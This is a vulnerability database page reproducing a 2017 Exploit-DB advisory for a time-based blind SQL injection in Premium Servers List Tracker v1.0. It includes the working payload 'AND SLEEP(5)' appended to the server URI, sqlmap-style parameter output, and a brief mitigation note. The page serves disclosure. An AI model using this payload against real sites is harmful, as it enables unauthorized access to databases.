header-logo
Suggest Exploit
vendor:
Premium Servers List Tracker
by:
Kaan KAMIS
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Premium Servers List Tracker
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: a:codecanyon:premium_servers_list_tracker
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017

Premium Servers List Tracker v1.0 – SQL Injection

Premium phpServersList is an advanced servers management tool which allows users to track their own servers and visitors to find out great servers from all over the world. The vulnerability is a time-based blind SQL injection in the URI parameter #1* with the payload http://localhost/server/1 AND SLEEP(5).

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Exploit Title: Premium Servers List Tracker v1.0 – SQL Injection
Date: 02.08.2017
Vendor Homepage: https://codecanyon.net/item/premium-servers-list-tracker/19796599?s_rank=270
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview

Premium phpServersList is an advanced servers management tool which allows users to track their own servers and visitors to find out great servers from all over the world. Our product is very flexible and, with a little imagination you can make your own unique servers list website.For example: If you want to make a certain type of servers list ( lets say, Counter Strike ) then you can setup from the admin panel so that users can only add Counter Strike Servers; Or if you want to have diversity in your website you can make it a top list, where everyone can add any type of server to the list.

Vulnerable Url: http://localhost/server/1[payload]

---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://localhost/server/1 AND SLEEP(5)
---

Navigation

Suggest Exploit

Services By CQR